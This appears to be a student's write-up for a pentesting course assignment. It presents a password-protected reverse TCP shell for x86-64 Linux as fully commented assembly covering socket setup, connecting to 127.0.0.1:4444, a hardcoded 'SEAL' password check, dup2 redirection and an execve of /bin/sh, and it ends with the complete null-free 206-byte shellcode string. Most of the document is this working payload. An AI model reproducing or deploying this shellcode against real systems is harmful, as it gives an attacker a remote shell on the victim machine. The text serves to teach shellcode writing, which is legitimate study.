ASSIGNMENT #2

Shell Reverse TCP

Requirements:
*Reverse connect to a configured IP and port
*Needs a password
*If password correct execs a shell
*Remove 0x00

Repository:https://github.com/Farad77/pentestAssign2.git
So for this second assignment, the idea was to add an authentication system to a reverse TCP shell.
The binary connects to a port and then waits for the password before giving a shell.

Socket initialisation

        xor rax,rax                     ; rax = 41 -> SYS_socket on x86-64 Linux (xor + add al avoids a 0x00 in the encoding)
	add al,41
	xor rsi,rsi                     ; rsi = 1 -> SOCK_STREAM
	add sil,1
	xor rdi,rdi                     ; rdi = 2 -> AF_INET
	add dil,2
	xor rdx,rdx                     ; rdx = 0 -> protocol

	syscall ;socket create: rax = new fd (or -errno, which is not checked)

	mov rdi,rax ;socket fd kept in rdi; syscall only clobbers rcx/r11, so rdi survives every syscall below until exec

	xor rax,rax
	push rax                        ; 8 zero bytes: the sin_zero padding of the sockaddr_in assembled just below

;the 16-byte sockaddr_in is written byte by byte under rsp (so no 0x00 lands in the code), then rsp is moved onto it:
;  [rsp-8] word  sin_family = AF_INET (2)
;  [rsp-6] word  sin_port   = 4444 in network byte order (bytes 11 5c)
;  [rsp-4] dword sin_addr   = 127.0.0.1 (bytes 7f 00 00 01)
;  [rsp]   the 8 zero bytes pushed above (sin_zero)
	xor rax,rax
	mov byte [rsp-01],0x01          ; last octet of 127.0.0.1
	mov byte  [rsp-02],al           ; .0 (al == 0)
	mov byte [rsp-03],al            ; .0
	mov byte [rsp-4],0x7f           ; first octet 127
	mov word [rsp-6],0x5c11 ;stored little-endian as bytes 11 5c = 0x115c = 4444 when read in network byte order
	inc rax
	inc rax                         ; rax = 2 = AF_INET
	mov word [rsp-8],ax
	sub rsp,8                       ; rsp now points at the start of the struct

;connect= syscall 42: connect(rdi = sockfd, rsi = &sockaddr_in, rdx = 16)
	xor rax,rax
	add al,42
	mov rsi,rsp
	xor rdx,rdx
	add dl,16
	syscall  ;connect; the return value is not checked, a failed connect still falls through to the password read

jmp waitPassword                        ; jmp/call/pop: obtain the address of the password buffer without absolute addressing

We connect to 127.0.0.1 on port 4444 and go to waitPassword

;;;;;;;;;;;;;;;;;;;;;;;;;;;jmpcallpop from waitforPassword (buffer for password)
getBufferAddr:
	pop rsi                         ; rsi = return address pushed by the call = the 5 bytes at 'pass'
	;read 5bytes: read(rdi = sockfd, rsi = pass, rdx = 5); rax = 0 = SYS_read
	xor rax,rax
	xor rdx,rdx
	add dl,5
	syscall                         ; NOTE(review): the bytes land inside the code itself; on a non-writable text segment this read fails and the stale "AAAAB" is compared instead. The byte count returned in rax is never checked (a short read is accepted)

	cmp dword [rsi],0x4c414553 ;compare it with SEAL (bytes 53 45 41 4c); only the first 4 of the 5 bytes read are checked, the 5th is ignored. The password is a fixed constant visible in clear in the payload bytes and on the wire
	je auth_ok

	xor rax, rax                    ; wrong password: exit(0); rax = 60 = SYS_exit (64-bit add form keeps the encoding free of 0x00)
	add rax, 60
	xor rdi, rdi
	syscall	

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
waitPassword:
	call getBufferAddr              ; pushes the address of 'pass' as the return address, popped into rsi above
	pass db "AAAAB"                 ; 5-byte scratch buffer overwritten by read(); its initial content never matches "SEAL"

The password is 5 bytes, so we read it from the socket and compare it with our hardcoded password « SEAL ».
If auth is not OK we exit; if the password matches we launch a shell (/bin/sh).

auth_ok:
;dup2 0: dup2(rdi = sockfd, rsi = 0) -> stdin now comes from the socket (rdi still holds the fd from the socket call)
	xor rax,rax	
	add al,33 ;dup2 (SYS_dup2 = 33 on x86-64)
	xor rsi,rsi
	syscall
;dup2 1: stdout -> socket
	xor rax,rax
	add al,33
	xor rsi,rsi
	add sil,1
	syscall

;dup2 2: stderr -> socket
	xor rax,rax
	add al,33
	xor rsi,rsi
	add sil,2
	syscall
	jmp short exec                  ; none of the dup2 return values are checked
...
exec:
	; execve("/bin//sh", ["/bin//sh", NULL], NULL), all arguments built on the stack
	; First NULL push: terminates the string and serves as the argv/envp NULL entry

	xor rax, rax
	push rax

	; push /bin//sh in reverse ("//" pads the path to exactly 8 bytes so the qword contains no 0x00)

	mov rbx, 0x68732f2f6e69622f
	push rbx

	; store /bin//sh address in RDI (execve arg 1: pathname)

	mov rdi, rsp

	; Second NULL push: the NULL entry that ends argv (and that envp points at)
	push rax

	; set RDX: envp = pointer to a NULL entry, i.e. an empty environment
	mov rdx, rsp 


	; Push address of /bin//sh: argv[0]
	push rdi

	; set RSI: argv = rsp -> { "/bin//sh", NULL }

	mov rsi, rsp

	; Call the Execve syscall: SYS_execve = 59; rax is still 0 from the xor above (no instruction in between writes it)
	add rax, 59
	syscall


	

ShellCode in byte is « \x48\x31\xc0\x04\x29\x48\x31\xf6\x40\x80\xc6\x01\x48\x31\xff\x40\x80\xc7\x02\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x48\x31\xc0\xc6\x44\x24\xff\x01\x88\x44\x24\xfe\x88\x44\x24\xfd\xc6\x44\x24\xfc\x7f\x66\xc7\x44\x24\xfa\x11\x5c\x48\xff\xc0\x48\xff\xc0\x66\x89\x44\x24\xf8\x48\x83\xec\x08\x48\x31\xc0\x04\x2a\x48\x89\xe6\x48\x31\xd2\x80\xc2\x10\x0f\x05\xeb\x48\x48\x31\xc0\x04\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\x04\x21\x48\x31\xf6\x40\x80\xc6\x01\x0f\x05\x48\x31\xc0\x04\x21\x48\x31\xf6\x40\x80\xc6\x02\x0f\x05\xeb\x2a\x5e\x48\x31\xc0\x48\x31\xd2\x80\xc2\x05\x0f\x05\x81\x3e\x53\x45\x41\x4c\x74\xc4\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xdb\xff\xff\xff\x41\x41\x41\x41\x42\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05 »

No null bytes, and 206 bytes long.
